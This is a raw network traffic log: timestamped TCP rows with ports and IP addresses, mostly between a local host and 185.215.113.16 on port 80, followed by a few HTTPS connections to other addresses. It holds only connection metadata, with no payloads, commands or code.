Dec 26, 2024 14:14:54.853394985 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.853487968 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.853841066 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.853888035 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.871649981 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.878770113 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.878896952 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.878907919 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.878984928 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.879024029 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.879064083 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.879226923 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.879240036 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.879256964 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.879287004 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.904449940 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.045378923 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045484066 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045495033 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045536995 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.045546055 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045557022 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045568943 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045578957 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.045602083 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.045625925 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.046220064 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046344995 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046386003 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.046473980 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046484947 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046515942 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.046849966 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046861887 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046871901 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.046895027 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.046921015 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.046933889 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.047580004 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.047621965 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.047622919 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.047636032 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.047673941 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.047712088 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.048394918 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.048485041 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.048496008 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.048541069 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.048734903 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.049381971 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.049391985 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.049403906 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.049433947 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.049448967 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.049465895 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.049945116 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050005913 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050018072 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050050974 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.050070047 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.050120115 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050780058 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050789118 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050798893 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.050821066 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.050849915 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.050908089 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.051541090 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.051600933 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.051609993 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.051646948 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.051675081 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.051690102 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.052337885 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.052422047 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.052432060 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.052500010 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.052508116 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.053261042 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.053284883 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.053296089 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.053327084 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.053381920 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.053406954 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.053894997 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.053937912 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.053955078 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.053966999 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.054004908 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.054064989 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.054758072 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.054769039 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.054778099 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.054806948 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.054838896 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.054862976 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.055582047 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.055592060 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.055602074 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.055627108 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.055654049 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.055664062 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.056345940 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.056356907 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.056366920 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.056401968 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.056427002 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.056495905 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057109118 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057147980 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.057152033 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057163000 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057193995 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.057277918 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057898045 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057951927 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057962894 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.057998896 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.058106899 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.058715105 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.058733940 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.058743954 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.058763981 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.058779955 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.058880091 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.059513092 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.059531927 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.059540987 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.059566975 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.059606075 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.059660912 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.060288906 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.060362101 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.060372114 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.060416937 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.060487032 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061065912 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061108112 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.061109066 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061120987 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061161041 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.061239004 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061897039 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061949015 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.061960936 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.062000036 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.062052965 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.062683105 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.062725067 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.062735081 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.062740088 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.062808990 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.062853098 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.063541889 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.063607931 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.063618898 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.063648939 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.063664913 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.063709021 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.064403057 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.064481020 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.064491987 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.064531088 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.064557076 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.067591906 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.088609934 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.088747978 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.088757038 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.088769913 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.088782072 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.088792086 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.088792086 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.088828087 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.088860035 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.089463949 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.089500904 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.089570999 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.095611095 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.097269058 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.255909920 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256127119 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256135941 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256146908 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256159067 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256169081 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256181002 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.256232023 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.256731987 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256786108 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.256829023 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.256973028 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257019997 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257030964 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257071972 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.257076979 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257371902 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.257695913 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257713079 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257725000 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.257755995 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.257823944 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.258289099 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.258330107 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.258337021 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.258347034 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.258373976 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.258558035 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.258599997 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.259128094 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259139061 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259150028 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259174109 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.259183884 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259223938 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.259874105 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259895086 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259906054 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.259934902 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.260011911 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.260543108 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.260615110 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.260684967 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.260695934 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.260721922 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.260725021 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.260768890 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.261497974 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.261508942 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.261521101 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.261555910 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.261583090 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.262011051 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.262214899 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.262314081 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.262325048 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.262383938 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.262628078 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263041973 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.263076067 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263087034 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263098955 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263133049 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.263199091 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263794899 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.263807058 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263845921 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263858080 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.263890982 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.263938904 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.264882088 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.264923096 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.264961958 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.264972925 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.264998913 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.265014887 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.265616894 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.265628099 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.265639067 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.265660048 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.265707016 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.266230106 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.266273022 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.266277075 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.266290903 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.266321898 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.266331911 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.267009974 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267030954 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267041922 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267054081 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.267069101 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.267146111 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267184019 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.267827988 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267846107 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267858028 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.267887115 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.268083096 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.268574953 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.268615007 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.268621922 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.268625975 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.268660069 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.268763065 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.268800974 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.269381046 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.269401073 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.269412041 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.269443989 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.269510984 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.270215034 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.270258904 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.270447016 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:55.271789074 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:55.294670105 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:15:05.203840017 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:05.203886986 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:05.204047918 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:05.204253912 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:05.204262018 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:05.869931936 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:15:06.995280981 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:06.995524883 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:06.995538950 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:06.997376919 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:06.997442961 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:06.998477936 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:06.998567104 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:07.062767982 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:07.062782049 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:07.110230923 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:09.542557955 CET	49703	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:09.542687893 CET	49703	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:09.543032885 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:09.543071032 CET	443	49740	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:09.543175936 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:09.543457031 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:09.543473005 CET	443	49740	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:09.662867069 CET	443	49703	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:09.662878036 CET	443	49703	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:10.976429939 CET	443	49740	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:10.976536989 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:16.732465029 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:16.732523918 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:16.732609034 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:16.976239920 CET	49730	443	192.168.2.8	142.250.181.68
Dec 26, 2024 14:15:16.976269007 CET	443	49730	142.250.181.68	192.168.2.8
Dec 26, 2024 14:15:30.363833904 CET	443	49740	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:30.363908052 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:37.760348082 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:37.760456085 CET	443	49740	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:37.760502100 CET	49740	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:37.760524035 CET	443	49740	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:37.760732889 CET	49787	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:37.760796070 CET	443	49787	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:37.760852098 CET	49787	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:37.761562109 CET	49787	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:15:37.761622906 CET	443	49787	23.206.229.226	192.168.2.8
Dec 26, 2024 14:15:37.761671066 CET	49787	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:16:05.118973970 CET	49846	443	192.168.2.8	142.250.181.68
